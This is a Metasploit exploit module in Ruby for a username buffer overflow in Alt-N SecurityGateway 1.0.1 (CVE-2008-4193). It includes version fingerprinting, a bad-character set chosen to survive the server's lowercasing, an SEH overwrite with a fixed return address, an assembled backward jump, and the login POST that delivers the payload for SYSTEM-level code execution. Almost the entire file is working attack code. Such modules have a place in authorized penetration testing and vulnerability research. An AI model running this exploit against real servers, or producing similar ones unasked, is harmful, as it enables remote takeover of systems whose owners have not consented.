##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
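class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  # XXX: Automatic targetting used HttpFingerprint = { :uri => '/SecurityGateway.dll', :pattern => [ /SecurityGateway / ] }

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Seh

  # Module metadata (name, description, references, payload constraints,
  # targets) and the RPORT default. `info` is the hash supplied by the
  # framework and is merged through update_info.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Alt-N SecurityGateway username Buffer Overflow',
        'Description' => %q{
          Alt-N SecurityGateway is prone to a buffer overflow condition. This
          is due to insufficient bounds checking on the "username"
          parameter. Successful exploitation could result in code
          execution with SYSTEM level privileges.

          NOTE: This service doesn't restart, you'll only get one shot. However,
          it often survives a successful exploitation attempt.
        },
        'Author' => [ 'jduck' ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2008-4193' ],
          [ 'OSVDB', '45854' ],
          [ 'BID', '29457']
        ],
        'Privileged' => true,
        'DefaultOptions' => {
          'EXITFUNC' => 'thread',
        },
        'Payload' => {
          'Space' => 476,
          # note: 0xd7 might not be translated, but w/e
          # The excluded ranges cover the bytes the server's lowercasing step
          # (see the comment in #exploit) would rewrite, plus NUL.
          'BadChars' => "\x00" + ((0x40..0x5a).to_a + [ 0x8a, 0x8c, 0x8e, 0x9f ] + (0xc0..0xdf).to_a).pack('C*'),
          'StackAdjustment' => -3500,
          'EncoderType' => Msf::Encoder::Type::SingleStaticBit,
          'EncoderOptions' => {
            'BitNumber' => 0x5,
            'BitValue' => true,
          }
        },
        'Platform' => 'win',
        'Targets' => [
          [ 'Automatic Targeting', {} ],
          # NOTE: the return address must be tolower() safe
          [ 'SecurityGateway 1.0.1 Universal', { 'Ret' => 0x6767756f }], # p/p/r in XceedZip.dll 4.5.77.0
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2008-06-02',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        Opt::RPORT(4000)
      ]
    )
  end

  # Identify the target based on the SecurityGateway version number found
  # in the HTTP fingerprint of /SecurityGateway.dll.
  #
  # @return [Msf::Module::Target, nil] the matching `targets` entry, or nil
  #   when no fingerprint was obtained or the version is not one this
  #   module handles (treated as not vulnerable).
  def auto_target
    info = http_fingerprint({ :uri => '/SecurityGateway.dll' }) # automatic targetting
    # Regexp#match returns nil for a nil fingerprint, so a missing banner
    # falls through to the "not vulnerable" result below.
    version = /SecurityGateway (1\..*)$/.match(info)
    return nil unless version

    # Any other 1.x release is left unmatched: not vulnerable.
    case version[1]
    when /1\.0\.1/
      targets[1]
    end
  end

  # Report Appears only when auto_target recognises a handled version.
  # The previous body discarded the value of its `if` expression, so the
  # method always returned Safe even when a target was identified.
  #
  # @return [Msf::Exploit::CheckCode]
  def check
    return Exploit::CheckCode::Appears if auto_target

    Exploit::CheckCode::Safe
  end

  # Resolve the target (automatically when the "Automatic" target is
  # selected), build the overlong username value, submit it in the login
  # POST and hand over to the payload handler.
  #
  # @raise [Msf::Exploit::Failed] via fail_with when automatic targeting
  #   finds nothing usable.
  def exploit
    # handle auto-targeting
    mytarget = target
    if target.name =~ /Automatic/
      print_status("Attempting to automatically select a target...")
      mytarget = auto_target
      if mytarget.nil?
        fail_with(Failure::NoTarget, "Unable to automatically select a target")
      end
      print_status("Automatically selected target \"#{mytarget.name}\"")
    end

    # the buffer gets CharLowerBuff()'d and passed to:
    # sprintf(str, "Attempt to login with invalid user name %s from %s", buf, ip_str);

    # Statement order determines the buffer layout; do not reorder.
    sploit = payload.encoded
    sploit << generate_seh_record(mytarget.ret)
    distance = payload_space + 8
    sploit << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + distance.to_s).encode_string
    sploit = Rex::Text.to_hex(sploit, '%')
    sploit << rand_text_alphanumeric(512)

    post_data = 'RequestedPage=login'
    post_data << '&username=' << sploit
    post_data << '&passwd=world'

    print_status("Sending request...")
    # The response is not inspected (the service may not answer at all, see
    # the NOTE in the description); the second argument is the timeout in
    # seconds, kept short for that reason.
    send_request_cgi({
      'uri' => '/SecurityGateway.dll',
      'method' => 'POST',
      'content-type' => 'application/x-www-form-urlencoded',
      'data' => post_data,
    }, 5)

    handler
  end
end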